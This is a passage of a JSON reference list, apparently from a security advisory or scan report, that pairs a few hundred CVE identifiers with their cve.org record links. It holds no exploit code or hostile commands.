"url": "https://www.cve.org/CVERecord?id=CVE-2023-0217"
},
{
"name": "CVE-2024-58266",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58266"
},
{
"name": "CVE-2025-38298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38298"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2025-50098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50098"
},
{
"name": "CVE-2022-43552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43552"
},
{
"name": "CVE-2018-1000076",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000076"
},
{
"name": "CVE-2022-4293",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4293"
},
{
"name": "CVE-2025-37974",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37974"
},
{
"name": "CVE-2025-5915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
},
{
"name": "CVE-2024-57834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57834"
},
{
"name": "CVE-2025-55197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55197"
},
{
"name": "CVE-2022-32743",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32743"
},
{
"name": "CVE-2025-55558",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55558"
},
{
"name": "CVE-2022-21291",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21291"
},
{
"name": "CVE-2024-58017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58017"
},
{
"name": "CVE-2025-5917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
},
{
"name": "CVE-2025-26603",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26603"
},
{
"name": "CVE-2023-35116",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35116"
},
{
"name": "CVE-2025-38078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38078"
},
{
"name": "CVE-2025-21809",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21809"
},
{
"name": "CVE-2025-38419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38419"
},
{
"name": "CVE-2024-45490",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45490"
},
{
"name": "CVE-2021-32490",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32490"
},
{
"name": "CVE-2020-27768",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27768"
},
{
"name": "CVE-2024-38820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38820"
},
{
"name": "CVE-2025-50086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50086"
},
{
"name": "CVE-2016-5118",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-5118"
},
{
"name": "CVE-2022-3786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3786"
},
{
"name": "CVE-2023-46045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46045"
},
{
"name": "CVE-2025-37889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37889"
},
{
"name": "CVE-2021-3995",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3995"
},
{
"name": "CVE-2015-4788",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4788"
},
{
"name": "CVE-2025-55557",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55557"
},
{
"name": "CVE-2024-12085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12085"
},
{
"name": "CVE-2022-24599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24599"
},
{
"name": "CVE-2025-21981",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21981"
},
{
"name": "CVE-2025-38211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38211"
},
{
"name": "CVE-2025-2999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2999"
},
{
"name": "CVE-2023-48795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48795"
},
{
"name": "CVE-2025-21910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21910"
},
{
"name": "CVE-2021-35452",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35452"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2023-28319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28319"
},
{
"name": "CVE-2021-35565",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35565"
},
{
"name": "CVE-2020-10251",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10251"
},
{
"name": "CVE-2024-11584",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11584"
},
{
"name": "CVE-2024-45491",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45491"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2020-2981",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2981"
},
{
"name": "CVE-2025-21745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21745"
},
{
"name": "CVE-2025-21791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21791"
},
{
"name": "CVE-2020-18781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-18781"
},
{
"name": "CVE-2025-7709",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7709"
},
{
"name": "CVE-2024-52559",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52559"
},
{
"name": "CVE-2025-38077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38077"
},
{
"name": "CVE-2025-38251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38251"
},
{
"name": "CVE-2022-22576",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22576"
},
{
"name": "CVE-2025-38120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38120"
},
{
"name": "CVE-2017-7186",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7186"
},
{
"name": "CVE-2025-38285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38285"
},
{
"name": "CVE-2025-59375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59375"
},
{
"name": "CVE-2025-37750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37750"
},
{
"name": "CVE-2021-39293",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39293"
},
{
"name": "CVE-2025-21795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21795"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2025-22014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22014"
},
{
"name": "CVE-2025-38161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38161"
},
{
"name": "CVE-2025-9640",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9640"
},
{
"name": "CVE-2022-1897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1897"
},
{
"name": "CVE-2022-43248",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43248"
},
{
"name": "CVE-2016-3418",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-3418"
},
{
"name": "CVE-2022-29824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29824"
},
{
"name": "CVE-2024-58081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58081"
},
{
"name": "CVE-2022-1705",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1705"
},
{
"name": "CVE-2024-11053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
},
{
"name": "CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"name": "CVE-2025-21814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21814"
},
{
"name": "CVE-2025-50082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50082"
},
{
"name": "CVE-2017-6829",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6829"
},
{
"name": "CVE-2025-32462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32462"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2025-50097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50097"
},
{
"name": "CVE-2021-4214",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4214"
},
{
"name": "CVE-2025-21911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21911"
},
{
"name": "CVE-2023-24752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24752"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2024-21742",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21742"
},
{
"name": "CVE-2022-43245",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43245"
},
{
"name": "CVE-2015-2656",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2656"
},
{
"name": "CVE-2025-50084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50084"
},
{
"name": "CVE-2018-9133",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-9133"
},
{
"name": "CVE-2025-50079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50079"
},
{
"name": "CVE-2025-38115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38115"
},
{
"name": "CVE-2025-21758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21758"
},
{
"name": "CVE-2023-0767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0767"
},
{
"name": "CVE-2025-21816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21816"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2021-35603",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35603"
},
{
"name": "CVE-2025-21996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21996"
},
{
"name": "CVE-2021-36410",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36410"
},
{
"name": "CVE-2025-21780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21780"
},
{
"name": "CVE-2017-3612",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3612"
},
{
"name": "CVE-2024-12705",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12705"
},
{
"name": "CVE-2025-38153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38153"
},
{
"name": "CVE-2025-21787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21787"
},
{
"name": "CVE-2023-28487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28487"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2023-31439",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31439"
},
{
"name": "CVE-2023-51074",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51074"
},
{
"name": "CVE-2023-23915",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23915"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2018-1000074",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000074"
},
{
"name": "CVE-2025-37785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37785"
},
{
"name": "CVE-2025-21776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21776"
},
{
"name": "CVE-2024-58003",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58003"
},
{
"name": "CVE-2025-21917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21917"
},
{
"name": "CVE-2025-21706",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21706"
},
{
"name": "CVE-2025-48964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48964"
},
{
"name": "CVE-2025-55193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55193"
},
{
"name": "CVE-2025-38395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38395"
},
{
"name": "CVE-2023-29499",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29499"
},
{
"name": "CVE-2025-21574",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21574"
},
{
"name": "CVE-2022-42011",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42011"
},
{
"name": "CVE-2023-39318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39318"
},
{
"name": "CVE-2025-38337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38337"
},
{
"name": "CVE-2025-21957",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21957"
},
{
"name": "CVE-2025-38727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38727"
},
{
"name": "CVE-2022-41720",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41720"
},
{
"name": "CVE-2024-1013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1013"
},
{
"name": "CVE-2022-0319",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0319"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2025-30258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
},
{
"name": "CVE-2025-21999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21999"
},
{
"name": "CVE-2025-4565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4565"
},
{
"name": "CVE-2022-41716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41716"
},
{
"name": "CVE-2025-38465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38465"
},
{
"name": "CVE-2024-56406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
},
{
"name": "CVE-2025-38513",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38513"
},
{
"name": "CVE-2025-21736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21736"
},
{
"name": "CVE-2025-21997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21997"
},
{
"name": "CVE-2025-21741",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21741"
},
{
"name": "CVE-2020-18032",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-18032"
},
{
"name": "CVE-2017-6833",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6833"
},
{
"name": "CVE-2025-21808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21808"
},
{
"name": "CVE-2019-8324",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8324"
},
{
"name": "CVE-2020-2754",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2754"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2024-24788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24788"
},
{
"name": "CVE-2024-58076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58076"
},
{
"name": "CVE-2023-24751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24751"
},
{
"name": "CVE-2025-21708",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21708"
},
{
"name": "CVE-2015-4784",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4784"
},
{
"name": "CVE-2021-4048",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4048"
},
{
"name": "CVE-2023-4527",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4527"
},
{
"name": "CVE-2022-2980",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2980"
},
{
"name": "CVE-2025-5278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
},
{
"name": "CVE-2025-21992",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21992"
},
{
"name": "CVE-2025-21720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21720"
},
{
"name": "CVE-2025-32463",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32463"
},
{
"name": "CVE-2015-7747",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7747"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2023-34055",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34055"
},
{
"name": "CVE-2024-41965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41965"
},
{
"name": "CVE-2020-14796",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14796"
},
{
"name": "CVE-2024-56433",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
},
{
"name": "CVE-2023-0464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
},
{
"name": "CVE-2025-55004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55004"
},
{
"name": "CVE-2014-8139",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8139"
},
{
"name": "CVE-2025-21580",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21580"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-5318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5318"
},
{
"name": "CVE-2025-38003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38003"
},
{
"name": "CVE-2025-38441",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38441"
},
{
"name": "CVE-2023-51767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51767"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2023-6918",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6918"
},
{
"name": "CVE-2023-38037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38037"
},
{
"name": "CVE-2012-5783",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-5783"
},
{
"name": "CVE-2022-2519",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2519"
},
{
"name": "CVE-2025-55754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55754"
},
{
"name": "CVE-2025-53023",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53023"
},
{
"name": "CVE-2025-21711",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21711"
},
{
"name": "CVE-2025-2998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2998"
},
{
"name": "CVE-2023-51792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51792"
},
{
"name": "CVE-2021-20313",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20313"
},
{
"name": "CVE-2022-30633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30633"
},
{
"name": "CVE-2023-23931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23931"
},
{
"name": "CVE-2025-21575",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21575"
},
{
"name": "CVE-2025-21978",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21978"
},
{
"name": "CVE-2019-16777",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16777"
},
{
"name": "CVE-2025-21760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21760"
},
{
"name": "CVE-2023-45913",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45913"
},
{
"name": "CVE-2018-13153",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13153"
},
{
"name": "CVE-2022-0530",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0530"
},
{
"name": "CVE-2023-48236",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48236"
},
{
"name": "CVE-2025-21947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21947"
},
{
"name": "CVE-2025-21913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21913"
},
{
"name": "CVE-2023-34474",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34474"
},
{
"name": "CVE-2025-21665",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21665"
},
{
"name": "CVE-2025-38227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38227"
},
{
"name": "CVE-2018-1000079",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000079"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2024-58079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58079"
},
{
"name": "CVE-2025-21966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21966"
},
{
"name": "CVE-2025-21577",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21577"
},
{
"name": "CVE-2021-45931",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45931"
},
{
"name": "CVE-2025-38079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38079"
},
{
"name": "CVE-2021-28544",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28544"
},
{
"name": "CVE-2021-46828",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46828"
},
{
"name": "CVE-2025-21734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21734"
},
{
"name": "CVE-2025-32728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32728"
},
{
"name": "CVE-2023-2804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2804"
},
{
"name": "CVE-2025-21970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21970"
},
{
"name": "CVE-2021-44964",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44964"
},
{
"name": "CVE-2025-6141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6141"
},
{
"name": "CVE-2022-42012",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42012"
},
{
"name": "CVE-2018-14437",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14437"
},
{
"name": "CVE-2024-13978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13978"
},
{
"name": "CVE-2025-21890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21890"
},
{
"name": "CVE-2025-61984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61984"
},
{
"name": "CVE-2021-3596",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3596"
},
{
"name": "CVE-2025-21916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21916"
},
{
"name": "CVE-2025-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21925"
},
{
"name": "CVE-2024-57883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57883"
},
{
"name": "CVE-2022-21628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21628"
},
{
"name": "CVE-2017-6830",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6830"
},
{
"name": "CVE-2025-21927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21927"
},
{
"name": "CVE-2021-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3520"
},
{
"name": "CVE-2024-47814",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47814"
},
{
"name": "CVE-2022-2923",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2923"
},
{
"name": "CVE-2025-21799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21799"
},
{
"name": "CVE-2024-21011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21011"
},
{
"name": "CVE-2025-6020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6020"
},
{
"name": "CVE-2015-2626",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2626"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2025-21748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21748"
},
{
"name": "CVE-2025-21785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21785"
},
{
"name": "CVE-2020-10029",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10029"
},
{
"name": "CVE-2025-7425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7425"
},
{
"name": "CVE-2023-3978",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3978"
},
{
"name": "CVE-2021-46310",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46310"
},
{
"name": "CVE-2022-36227",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36227"
},
{
"name": "CVE-2021-2369",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2369"
},
{
"name": "CVE-2025-21883",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21883"
},
{
"name": "CVE-2023-29469",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29469"
},
{
"name": "CVE-2024-5535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
},
{
"name": "CVE-2025-38074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38074"
},
{
"name": "CVE-2024-58086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58086"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-38245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38245"
},
{
"name": "CVE-2022-37454",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37454"
},
{
"name": "CVE-2021-36770",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36770"
},
{
"name": "CVE-2025-21898",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21898"
},
{
"name": "CVE-2020-14152",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14152"
},
{
"name": "CVE-2025-38324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38324"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2021-36976",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36976"
},
{
"name": "CVE-2024-58051",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58051"
},
{
"name": "CVE-2023-3164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3164"
},
{
"name": "CVE-2022-3597",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3597"
},
{
"name": "CVE-2023-27535",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27535"
},
{
"name": "CVE-2022-27775",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27775"
},
{
"name": "CVE-2024-56337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56337"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2018-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-25032"
},
{
"name": "CVE-2025-9390",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9390"
},
{
"name": "CVE-2025-62813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62813"
},
{
"name": "CVE-2025-21857",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21857"
},
{
"name": "CVE-2019-9904",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9904"
},
{
"name": "CVE-2025-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23085"
},
{
"name": "CVE-2022-42919",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42919"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2025-9165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9165"
},
{
"name": "CVE-2023-1981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1981"
},
{
"name": "CVE-2023-30571",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30571"
},
{
"name": "CVE-2022-2231",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2231"
},
{
"name": "CVE-2025-46150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46150"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2024-5642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
},
{
"name": "CVE-2024-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3219"
},
{
"name": "CVE-2025-21812",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21812"
},
{
"name": "CVE-2015-4781",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4781"
},
{
"name": "CVE-2023-23914",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23914"
},
{
"name": "CVE-2025-38542",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38542"
},
{
"name": "CVE-2025-38344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38344"
},
{
"name": "CVE-2023-28120",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28120"
},
{
"name": "CVE-2025-37797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37797"
},
{
"name": "CVE-2025-21848",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21848"
},
{
"name": "CVE-2021-3999",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3999"
},
{
"name": "CVE-2012-6153",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-6153"
},
{
"name": "CVE-2025-38088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38088"
},
{
"name": "CVE-2025-50096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50096"
},
{
"name": "CVE-2022-30632",
